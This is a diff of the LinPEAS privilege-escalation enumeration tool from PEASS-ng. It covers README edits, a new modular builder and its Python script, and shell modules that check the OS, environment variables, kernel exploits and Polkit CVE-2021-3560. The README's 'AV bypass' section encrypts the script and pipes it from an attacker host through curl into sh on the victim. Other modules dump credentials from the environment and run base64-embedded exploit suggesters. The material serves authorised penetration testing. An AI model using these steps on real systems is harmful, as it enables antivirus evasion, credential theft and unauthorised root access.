 ```bash
 #open-ssl encryption
 openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc
 sudo python -m SimpleHTTPServer 80 #Start HTTP server
 curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh #Download from the victim
 #Base64 encoded
 base64 -w0 linpeas.sh > lp.enc
 sudo python -m SimpleHTTPServer 80 #Start HTTP server
 curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim
 ```
 ## Firmware Analysis
 If you have a **firmware** and you want to **analyze it with linpeas** to **search for passwords or bad configured permissions** you have 2 main options.
@ -63,19 +92,6 @@ bash /linpeas.sh -o software_information,interesting_files,api_keys_regex
 bash /path/to/linpeas.sh -f /path/to/folder
 ```
 ## AV bypass
 ```bash
 #open-ssl encryption
 openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc
 sudo python -m SimpleHTTPServer 80 #Start HTTP server
 curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh #Download from the victim
 #Base64 encoded
 base64 -w0 linpeas.sh > lp.enc
 sudo python -m SimpleHTTPServer 80 #Start HTTP server
 curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim
 ```
 ## Basic Information
 The goal of this script is to search for possible **Privilege Escalation Paths** (tested in Debian, CentOS, FreeBSD, OpenBSD and MacOS).
@ -95,7 +111,7 @@ By default linpeas takes around **4 mins** to complete, but It could take from *
 **Interesting parameters:**
 - **-a** (all checks except regex) - This will **execute also the check of processes during 1 min, will search more possible hashes inside files, and brute-force each user using `su` with the top2000 passwords.**
 - **-e** (extra enumeration) - This will execute **enumeration checkes that are avoided by default**
- **-r** (regex checks) - This will search for **hundreds of API keys of different platforms in the silesystem**
+- **-r** (regex checks) - This will search for **hundreds of API keys of different platforms in the Filesystem**
 - **-s** (superfast & stealth) - This will bypass some time consuming checks - **Stealth mode** (Nothing will be written to disk)
 - **-P** (Password) - Pass a password that will be used with `sudo -l` and bruteforcing other users
 - **-D** (Debug) - Print information about the checks that haven't discovered anything and about the time each check took
@ -144,56 +160,23 @@ With LinPEAS you can also **discover hosts automatically** using `fping`, `ping`
 LinPEAS will **automatically search for this binaries** in `$PATH` and let you know if any of them is available. In that case you can use LinPEAS to hosts dicovery and/or port scanning.
-![](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/network.png)
+![](https://github.com/peass-ng/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/network.png)
 ## Colors
 <details>
 <summary>Details</summary>
 LinPEAS uses colors to indicate where does each section begin. But **it also uses them the identify potencial misconfigurations**.
-The ![](https://placehold.it/15/b32400/000000?text=+) **Red/Yellow** ![](https://placehold.it/15/fff500/000000?text=+) color is used for identifing configurations that lead to PE (99% sure).
+- The ![](https://placehold.it/15/b32400/000000?text=+) **Red/Yellow** ![](https://placehold.it/15/fff500/000000?text=+) color is used for identifing configurations that lead to PE (99% sure).
-The ![](https://placehold.it/15/b32400/000000?text=+) **Red** color is used for identifing suspicious configurations that could lead to PE:
+- The ![](https://placehold.it/15/b32400/000000?text=+) **Red** color is used for identifing suspicious configurations that could lead to privilege escalation.
 - Possible exploitable kernel versions
 - Vulnerable sudo versions
 - Identify processes running as root
 - Not mounted devices
 - Dangerous fstab permissions
 - Writable files in interesting directories
 - SUID/SGID binaries that have some vulnerable version (it also specifies the vulnerable version)
 - SUDO binaries that can be used to escalate privileges in sudo -l (without passwd) (https://gtfobins.github.io/)
 - Check /etc/doas.conf
 - 127.0.0.1 in netstat
 - Known files that could contain passwords
 - Capabilities in interesting binaries
 - Interesting capabilities of a binary
 - Writable folders and wilcards inside info about cron jobs
 - Writables folders in PATH
 - Groups that could lead to root
 - Files that could contains passwords
 - Suspicious cronjobs
-The ![](https://placehold.it/15/66ff33/000000?text=+) **Green** color is used for:
+- The ![](https://placehold.it/15/66ff33/000000?text=+) **Green** color is used for known good configurations (based on the name not on the conten!)
 - Common processes run by root
 - Common not interesting devices to mount
 - Not dangerous fstab permissions
 - SUID/SGID common binaries (the bin was already found in other machines and searchsploit doesn't identify any vulnerable version)
 - Common .sh files in path
 - Common names of users executing processes
 - Common cronjobs
-The ![](https://placehold.it/15/0066ff/000000?text=+) **Blue** color is used for:
+- The ![](https://placehold.it/15/0066ff/000000?text=+) **Blue** color is used for: Users without shell & Mounted devices
 - Users without shell
 - Mounted devices
-The ![](https://placehold.it/15/33ccff/000000?text=+) **Light Cyan** color is used for:
+- The ![](https://placehold.it/15/33ccff/000000?text=+) **Light Cyan** color is used for: Users with shell
 - Users with shell
-The ![](https://placehold.it/15/bf80ff/000000?text=+) **Light Magenta** color is used for:
+- The ![](https://placehold.it/15/bf80ff/000000?text=+) **Light Magenta** color is used for: Current username
 - Current username
 </details>
@ -218,15 +201,12 @@ Are you a PEASS fan? Get now our merch at **[PEASS Shop](https://teespring.com/s
 ## Collaborate
-If you want to help with the TODO tasks or with anything, you can do it using **[github issues](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues) or you can submit a pull request**.
+If you want to help with the TODO tasks or with anything, you can do it using **[github issues](https://github.com/peass-ng/privilege-escalation-awesome-scripts-suite/issues) or you can submit a pull request**.
-If you find any issue, please report it using **[github issues](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues)**.
+If you find any issue, please report it using **[github issues](https://github.com/peass-ng/privilege-escalation-awesome-scripts-suite/issues)**.
 **Linpeas** is being **updated** every time I find something that could be useful to escalate privileges.
 ## Advisory
 All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
 By Polop<sup>(TM)</sup>
--- a/linPEAS/builder/README.md
+++ b/linPEAS/builder/README.md
@ -0,0 +1,78 @@
 # Build you own linpeas!
 You can **build you own linpeas which will contain only the checks you want**. This is useful to reduce the time it takes to run linpeas and to make linpeas more stealth and modular.
 ## Quick start building linpeas.sh
 It's possible to indicate the params `--all`, `--all-no-fat` and `--small` to build the classic `linpeas_fat.sh`, `linpeas.sh` and `linpeas_small.sh`:
 - **linpeas_fat.sh**: Contains all checks, even third party applications in base64 embedded.
 - **linpeas.sh**: Contains all checks, but only the third party application `linux exploit suggester` is embedded. This is the default `linpeas.sh`.
 - **linpeas_small.sh**: Contains only the most *important* checks making its size smaller.
 However, in order to indicate only some specific checks, you can use the `--include` and `--exclude` params. These arguments supports a comma separated list of modules to add or remove from the final linpeas. Note that the matchs are done by checking **if the module path string contains any of the words** indicated in those params. Therefore, if you want to inde all the tests from the `linpeas_parts/3_cloud` it's enough to indicate `--include "cloud"`. Or if you want to include only the check `linpeas_parts/3_cloud/1_Check_if_in_Cloud` you can indicate `--include "Check_if_in_Cloud"`.
 ```bash
 # Run this commands from 1 level above the builder folder. From here: cd ..
 # Build linpeas_fat (linpeas with all checks, even third party applications in base64 embedded)
 python3 -m builder.linpeas_builder --all --output /tmp/linpeas_fat.sh
 # Build regular linpeas
 python3 -m builder.linpeas_builder --all-no-fat --output /tmp/linpeas.sh
 # Build small linpeas
 python3 -m builder.linpeas_builder --small --output /tmp/linpeas_small.sh
 # Build linpeas only with container and cloud checks
 python3 -m builder.linpeas_builder --include "container,cloud" --output /tmp/linpeas_custom.sh
 # Build linpeas only with regexes
 python3 -m builder.linpeas_builder --include "api_keys_regex" --output /tmp/linpeas_custom.sh
 # Build linpeas only with some specific modules
 ## You can customize it as much as you want
 python3 -m builder.linpeas_builder --include "CPU_info,Sudo_version,Clipboard_highlighted_text" --output /tmp/linpeas_custom.sh
 # Build linpeas excluding some specific modules
 python3 -m builder.linpeas_builder --exclude "CPU_info,Sudo_version,Clipboard_highlighted_text" --output /tmp/linpeas_custom.sh
 ```
 ## How to add new modules
 Adding new modules is very easy. You just need to create a new file in the `linpeas_parts/<corresponding section>` folder with the following structure with the bash code to run. Note that every new module should have some specific metadata at the beggining of the file. This metadata is used by the builder to generate the final linpeas.
 Metadata example:
 ```bash
 # Title: Cloud - Check if in cloud
 # ID: CL_Check_if_in_cloud
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Check if the current system is inside a cloud environment
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: check_aws_codebuild, check_aws_ec2, check_aws_ecs, check_aws_lambda, check_az_app, check_az_vm, check_do, check_gcp, check_ibm_vm, check_tencent_cvm, print_list
 # Global Variables: $is_aws_codebuild, $is_aws_ecs, $is_aws_ec2, , $is_aws_lambda, $is_az_app, $is_az_vm, $is_do, $is_gcp_vm, $is_gcp_function, $is_ibm_vm, $is_aws_ec2_beanstalk, $is_aliyun_ecs, $is_tencent_cvm
 # Initial Functions: check_gcp, check_aws_ecs, check_aws_ec2, check_aws_lambda, check_aws_codebuild, check_do, check_ibm_vm, check_az_vm, check_az_app, check_aliyun_ecs, check_tencent_cvm
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 1
 <code>
 ```
 ### Metadata parts explained
 - **Title**: Title of the module
 - **ID**: Unique identifier of the module. It has to be the same as the filename without the extension and with the section identifier as prefix (in this case `CL`)
 - **Author**: Author of the module
 - **Last Update**: Last update of the module
 - **Description**: Description of the module
 - **License**: License of the module
 - **Version**: Version of the module
 - **Functions Used**: Functions used by the module inside the bash code. If your module is using a function not defined here, linpeas won't be built.
 - **Global Variables**: Global variables used by the module inside the bash code. If your module is using a global variable not defined here, linpeas won't be built.
 - **Initial Functions**: Functions that are called at the beggining of the module. If your module is using a function not defined here, linpeas won't be built.
 - **Generated Global Variables**: Global variables generated (given a relevant value) by the module. If your module is generating a global variable not defined here, linpeas won't be built.
 - **Fat linpeas**: Set only as 1 if the module is loading a third party app, if not 0.
 - **Small linpeas**: Set as 1 if it's a quick check, if not 0.
--- a/linPEAS/builder/linpeas_base.sh
+++ b/linPEAS/builder/linpeas_base.sh
--- a/linPEAS/builder/linpeas_builder.py
+++ b/linPEAS/builder/linpeas_builder.py
@ -5,29 +5,51 @@ from .src.yamlGlobals import FINAL_FAT_LINPEAS_PATH, FINAL_LINPEAS_PATH, TEMPORA
 import os
 import stat
 import argparse
-#python3 -m builder.linpeas_builder
+# python3 -m builder.linpeas_builder
-def main():
+def main(all_modules, all_no_fat_modules, no_network_scanning, small, include_modules, exclude_modules, output):
    # Load configuration
    ploaded = PEASLoaded()
-    # Build temporary  linpeas_base.sh file
+    # Build temporary linpeas_base.sh file
-    lbasebuilder = LinpeasBaseBuilder()
+    lbasebuilder = LinpeasBaseBuilder(all_modules, all_no_fat_modules, no_network_scanning, small, include_modules, exclude_modules)
    lbasebuilder.build()
    # Build final linpeas.sh
    lbuilder = LinpeasBuilder(ploaded)
    lbuilder.build()
-    lbuilder.write_linpeas(FINAL_FAT_LINPEAS_PATH)
+    lbuilder.write_linpeas(output)
-    lbuilder.write_linpeas(FINAL_LINPEAS_PATH, rm_startswith="FAT_LINPEAS")
+    os.remove(TEMPORARY_LINPEAS_BASE_PATH) # Remove the built linpeas_base_temp.sh file
    os.remove(TEMPORARY_LINPEAS_BASE_PATH) #Remove the built linpeas_base.sh file
-    st = os.stat(FINAL_FAT_LINPEAS_PATH)
+    st = os.stat(output)
-    os.chmod(FINAL_FAT_LINPEAS_PATH, st.st_mode | stat.S_IEXEC)
+    os.chmod(output, st.st_mode | stat.S_IEXEC)
    st = os.stat(FINAL_LINPEAS_PATH)
    os.chmod(FINAL_LINPEAS_PATH, st.st_mode | stat.S_IEXEC)
 if __name__ == "__main__":
-    main()
+    parser = argparse.ArgumentParser(description='Build you own linpeas.sh')
    parser.add_argument('--all', action='store_true', help='Build linpeas with all modules (linpeas_fat).')
    parser.add_argument('--all-no-fat', action='store_true', help='Build linpeas with all modules except fat ones.')
    parser.add_argument('--no-network-scanning', action='store_true', help='Build linpeas without network scanning.')
    parser.add_argument('--small', action='store_true', help='Build small version of linpeas.')
    parser.add_argument('--include', type=str, help='Build linpeas only with the modules indicated you can indicate section names or module IDs).')
    parser.add_argument('--exclude', type=str, help='Exclude the given modules (you can indicate section names or module IDs).')
    parser.add_argument('--output', required=True, type=str, help='Path to write the final linpeas file to.')
    args = parser.parse_args()
    all_modules = args.all
    all_no_fat_modules = args.all_no_fat
    no_network_scanning = args.no_network_scanning
    small = args.small
    include_modules = args.include.split(",") if args.include else []
    include_modules = [m.strip().lower() for m in include_modules]
    exclude_modules = args.exclude.split(",") if args.exclude else []
    exclude_modules = [m.strip().lower() for m in exclude_modules]
    output = args.output
    # If not all, all-no-fat, small or include, exit
    if not args.all and not args.all_no_fat and not args.small and not args.include:
        print("You must specify one of the following options: --all, --all-no-fat, --small or --include")
        parser.print_help()
        exit(1)
    main(all_modules, all_no_fat_modules, no_network_scanning, small, include_modules, exclude_modules, output)
--- a/linPEAS/builder/linpeas_parts/10_api_keys_regex/regexes.sh
+++ b/linPEAS/builder/linpeas_parts/10_api_keys_regex/regexes.sh
@ -0,0 +1,20 @@
 # Title: API Keys Regex - Regexes
 # ID: RX_regexes
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Regexes
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, search_for_regex
 # Global Variables: $REGEXES, $TIMEOUT
 # Initial Functions:
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 0
 if [ "$REGEXES" ] && [ "$TIMEOUT" ]; then
    peass{REGEXES}
 else
    echo "Regexes to search for API keys aren't activated, use param '-r' "
 fi
--- a/linPEAS/builder/linpeas_parts/1_system_information.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information.sh
@ -1,101 +0,0 @@
 ###########################################
 #-------------) System Info (-------------#
 ###########################################
 #-- SY) OS
 print_2title "Operative system"
 print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits"
 (cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED},"
 warn_exec lsb_release -a 2>/dev/null
 if [ "$MACPEAS" ]; then
    warn_exec system_profiler SPSoftwareDataType
 fi
 echo ""
 #-- SY) Sudo
 print_2title "Sudo version"
 if [ "$(command -v sudo 2>/dev/null)" ]; then
 print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version"
 sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED},"
 else echo_not_found "sudo"
 fi
 echo ""
 #--SY) USBCreator
 if (busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator) || [ "$DEBUG" ]; then
    print_2title "USBCreator"
    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation"
    pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+")
    if [ -z "$pc_version" ]; then
        pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2)
    fi
    if [ -n "$pc_version" ]; then
        pc_length=${#pc_version}
        pc_major=$(echo "$pc_version" | cut -d. -f1)
        pc_minor=$(echo "$pc_version" | cut -d. -f2)
        if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor"  -lt 21 ]; then
            echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED},"
        fi
    fi
 fi
 echo ""
 #-- SY) PATH
 print_2title "PATH"
 print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses"
 if ! [ "$IAMROOT" ]; then
    echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g"
 fi
 if [ "$DEBUG" ]; then
     echo "New path exported: $PATH"
 fi
 echo ""
 #-- SY) Date
 print_2title "Date & uptime"
 warn_exec date 2>/dev/null
 warn_exec uptime 2>/dev/null
 echo ""
 #-- SY) System stats
 if [ "$EXTRA_CHECKS" ]; then
    print_2title "System stats"
    (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk"
    warn_exec free 2>/dev/null
    echo ""
 fi
 #-- SY) CPU info
 if [ "$EXTRA_CHECKS" ]; then
    print_2title "CPU info"
    warn_exec lscpu 2>/dev/null
    echo ""
 fi
 if [ -d "/dev" ] || [ "$DEBUG" ] ; then
    print_2title "Any sd*/disk* disk in /dev? (limit 20)"
    ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20
    echo ""
 fi
 if [ -f "/etc/fstab" ] || [ "$DEBUG" ]; then
    print_2title "Unmounted file-system?"
    print_info "Check if you can mount umounted devices"
    grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED},g" | sed -${E} "s%$mounted%${SED_BLUE}%g" | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g"
    echo ""
 fi
 if ([ "$(command -v diskutil)" ] || [ "$DEBUG" ]) && [ "$EXTRA_CHECKS" ]; then
    print_2title "Mounted disks information"
    warn_exec diskutil list
    echo ""
 fi
 if [ "$(command -v smbutil)" ] || [ "$DEBUG" ]; then
    print_2title "Mounted SMB Shares"
    warn_exec smbutil statshares -a
    echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/10_Environment.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/10_Environment.sh
@ -0,0 +1,39 @@
 # Title: System Information - Environment
 # ID: SY_Environment
 # Author: Carlos Polop
 # Last Update: 07-03-2024
 # Description: Check for sensitive information in environment variables that could lead to privilege escalation:
 #   - Credentials in environment variables
 #   - API keys and tokens
 #   - Sensitive configuration data
 #   - Common vulnerable scenarios:
 #     * Hardcoded credentials in environment
 #     * API keys exposed in environment
 #     * Database credentials in environment
 #     * Service account tokens
 #   - Exploitation methods:
 #     * Credential harvesting: Extract sensitive data from environment
 #     * Common attack vectors:
 #       - Password/credential extraction
 #       - API key abuse
 #       - Token theft
 #       - Configuration data leakage
 #     * Exploit techniques:
 #       - Environment variable dumping
 #       - Credential reuse
 #       - Token reuse
 #       - Configuration abuse
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: echo_not_found, print_2title, print_info
 # Global Variables: $NoEnvVars, $EnvVarsRed
 # Initial Functions:
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 1
 print_2title "Environment"
 print_info "Any private information inside environment variables?"
 (env || printenv || set) 2>/dev/null | grep -Eiv "$NoEnvVars" | sed -${E} "s,$EnvVarsRed,${SED_RED},g" || echo_not_found "env || set"
 echo ""
--- a/linPEAS/builder/linpeas_parts/1_system_information/11_Dmesg.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/11_Dmesg.sh
@ -0,0 +1,37 @@
 # Title: System Information - Dmesg
 # ID: SY_Dmesg
 # Author: Carlos Polop
 # Last Update: 07-03-2024
 # Description: Check for kernel signature verification failures that could lead to privilege escalation:
 #   - Failed kernel module signature verifications
 #   - Common vulnerable scenarios:
 #     * Disabled kernel module signing
 #     * Failed signature verifications
 #     * Unsigned kernel modules
 #   - Exploitation methods:
 #     * Kernel module injection: Load malicious kernel modules
 #     * Common attack vectors:
 #       - Kernel module loading
 #       - Kernel module replacement
 #       - Kernel module modification
 #     * Exploit techniques:
 #       - Module signing bypass
 #       - Kernel module injection
 #       - Kernel module modification
 #       - Kernel module replacement
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: echo_not_found, print_2title, print_info
 # Global Variables: $DEBUG
 # Initial Functions:
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 0
 if [ "$(command -v dmesg 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]; then
    print_2title "Searching Signature verification failed in dmesg"
    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#dmesg-signature-verification-failed"
    (dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg"
    echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/12_Macos_os_checks.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/12_Macos_os_checks.sh
@ -0,0 +1,52 @@
 # Title: System Information - MacOS OS checks
 # ID: SY_Macos_os_checks
 # Author: Carlos Polop
 # Last Update: 07-03-2024
 # Description: Check for MacOS-specific vulnerabilities and misconfigurations that could lead to privilege escalation:
 #   - Unsigned kernel extensions
 #   - Non-Apple kernel extensions
 #   - System Integrity Protection (SIP) status
 #   - Gatekeeper status
 #   - Common vulnerable scenarios:
 #     * Disabled SIP
 #     * Unsigned kernel extensions
 #     * Third-party kernel extensions
 #     * Disabled Gatekeeper
 #   - Exploitation methods:
 #     * Kernel extension injection: Load malicious kernel extensions
 #     * Common attack vectors:
 #       - SIP bypass
 #       - Kernel extension loading
 #       - Gatekeeper bypass
 #       - System modification
 #     * Exploit techniques:
 #       - Kernel extension injection
 #       - SIP bypass
 #       - Gatekeeper bypass
 #       - System modification
 # License: GNU GPL
 # Version: 1.0
 # Functions Used:macosNotSigned, print_2title
 # Global Variables: $MACPEAS
 # Initial Functions:
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 0
 if [ "$MACPEAS" ]; then
    print_2title "Kernel Extensions not belonging to apple"
    kextstat 2>/dev/null | grep -Ev " com.apple."
    echo ""
    print_2title "Unsigned Kernel Extensions"
    macosNotSigned /Library/Extensions
    macosNotSigned /System/Library/Extensions
    echo ""
 fi
 if [ "$MACPEAS" ] && [ "$(command -v brew 2>/dev/null || echo -n '')" ]; then
    print_2title "Brew Doctor Suggestions"
    brew doctor
    echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/13_Linux_exploit_suggester.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/13_Linux_exploit_suggester.sh
@ -0,0 +1,39 @@
 # Title: System Information - Linux Exploit Suggester
 # ID: SY_Linux_exploit_suggester
 # Author: Carlos Polop
 # Last Update: 07-03-2024
 # Description: Execute Linux Exploit Suggester to identify potential kernel exploits:
 #   - Automated kernel vulnerability detection
 #   - Common vulnerable scenarios:
 #     * Known kernel vulnerabilities
 #     * Unpatched kernel versions
 #     * Missing security patches
 #   - Exploitation methods:
 #     * Kernel exploit execution: Use suggested exploits
 #     * Common attack vectors:
 #       - Kernel memory corruption
 #       - Race conditions
 #       - Use-after-free
 #       - Integer overflow
 #     * Exploit techniques:
 #       - Kernel memory manipulation
 #       - Privilege escalation
 #       - Root access acquisition
 #       - System compromise
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, print_info
 # Global Variables: $MACPEAS
 # Initial Functions:
 # Generated Global Variables: $les_b64
 # Fat linpeas: 0
 # Small linpeas: 1
 if [ "$(command -v bash 2>/dev/null || echo -n '')" ] && ! [ "$MACPEAS" ]; then
    print_2title "Executing Linux Exploit Suggester"
    print_info "https://github.com/mzet-/linux-exploit-suggester"
    les_b64="peass{https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh}"
    echo $les_b64 | base64 -d | bash | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "\[CVE" -A 10 | grep -Ev "^\-\-$" | sed -${E} "s/\[(CVE-[0-9]+-[0-9]+,?)+\].*/${SED_RED}/g"
    echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/14_Linux_exploit_suggester_2.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/14_Linux_exploit_suggester_2.sh
@ -0,0 +1,41 @@
 # Title: System Information - Linux Exploit Suggester 2
 # ID: SY_Linux_exploit_suggester_2
 # Author: Carlos Polop
 # Last Update: 07-03-2024
 # Description: Execute Linux Exploit Suggester 2 (Perl version) to identify potential kernel exploits:
 #   - Alternative kernel vulnerability detection
 #   - Perl-based exploit suggestions
 #   - Common vulnerable scenarios:
 #     * Known kernel vulnerabilities
 #     * Unpatched kernel versions
 #     * Missing security patches
 #     * Alternative exploit paths
 #   - Exploitation methods:
 #     * Kernel exploit execution: Use suggested exploits
 #     * Common attack vectors:
 #       - Kernel memory corruption
 #       - Race conditions
 #       - Use-after-free
 #       - Integer overflow
 #     * Exploit techniques:
 #       - Kernel memory manipulation
 #       - Privilege escalation
 #       - Root access acquisition
 #       - System compromise
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, print_info
 # Global Variables:
 # Initial Functions:
 # Generated Global Variables: $les2_b64
 # Fat linpeas: 1
 # Small linpeas: 0
 if [ "$(command -v perl 2>/dev/null || echo -n '')" ] && ! [ "$MACPEAS" ]; then
    print_2title "Executing Linux Exploit Suggester 2"
    print_info "https://github.com/jondonas/linux-exploit-suggester-2"
    les2_b64="peass{https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl}"
    echo $les2_b64 | base64 -d | perl 2>/dev/null | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -iE "CVE" -B 1 -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,CVE-[0-9]+-[0-9]+,${SED_RED},g"
    echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/15_CVE_2021_3560.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/15_CVE_2021_3560.sh
@ -0,0 +1,39 @@
 # Title: System Information - CVE_2021_3560
 # ID: SY_CVE_2021_3560
 # Author: Carlos Polop
 # Last Update: 07-03-2024
 # Description: Check for Polkit vulnerability (CVE-2021-3560) that could lead to privilege escalation:
 #   - Vulnerable Polkit versions:
 #     * polkit 0.105-26 (Ubuntu)
 #     * polkit 0.117-2 (RHEL)
 #     * polkit 0.115-6 (RHEL)
 #   - Common vulnerable scenarios:
 #     * Unpatched Polkit versions
 #     * Default Polkit configurations
 #   - Exploitation methods:
 #     * Race condition in Polkit authentication
 #     * Common attack vectors:
 #       - Authentication bypass
 #       - Privilege escalation
 #       - Root access acquisition
 #     * Exploit techniques:
 #       - Race condition exploitation
 #       - Authentication bypass
 #       - Privilege escalation
 #       - System compromise
 # License: GNU GPL
 # Version: 1.0
 # Functions Used:
 # Global Variables:
 # Initial Functions:
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 0
 if apt list --installed 2>/dev/null | grep -q 'polkit.*0\.105-26' || \
   yum list installed 2>/dev/null | grep -q 'polkit.*\(0\.117-2\|0\.115-6\)' || \
   rpm -qa 2>/dev/null | grep -q 'polkit.*\(0\.117-2\|0\.115-6\)'; then
    echo "Vulnerable to CVE-2021-3560" | sed -${E} "s,.*,${SED_RED_YELLOW},"
    echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/16_Protections.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/16_Protections.sh
@ -0,0 +1,139 @@
 # Title: System Information - Protections
 # ID: SY_Protections
 # Author: Carlos Polop
 # Last Update: 07-03-2024
 # Description: Check for system security protections and their bypass possibilities:
 #   - AppArmor/SELinux status and profiles
 #   - ASLR status
 #   - Seccomp filters
 #   - Capabilities
 #   - Common vulnerable scenarios:
 #     * Disabled security modules
 #     * Weak security profiles
 #     * Missing security features
 #     * Misconfigured protections
 #   - Exploitation methods:
 #     * Protection bypass: Circumvent security measures
 #     * Common attack vectors:
 #       - AppArmor/SELinux bypass
 #       - ASLR bypass
 #       - Seccomp filter bypass
 #       - Capability abuse
 #     * Exploit techniques:
 #       - Profile bypass
 #       - Memory randomization bypass
 #       - Filter bypass
 #       - Capability exploitation
 #       - Protection circumvention
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: echo_not_found, print_2title, print_list, warn_exec
 # Global Variables:
 # Initial Functions:
 # Generated Global Variables: $ASLR, $hypervisorflag, $detectedvirt
 # Fat linpeas: 0
 # Small linpeas: 0
 #-- SY) AppArmor
 print_2title "Protections"
 print_list "AppArmor enabled? .............. "$NC
 if [ "$(command -v aa-status 2>/dev/null || echo -n '')" ]; then
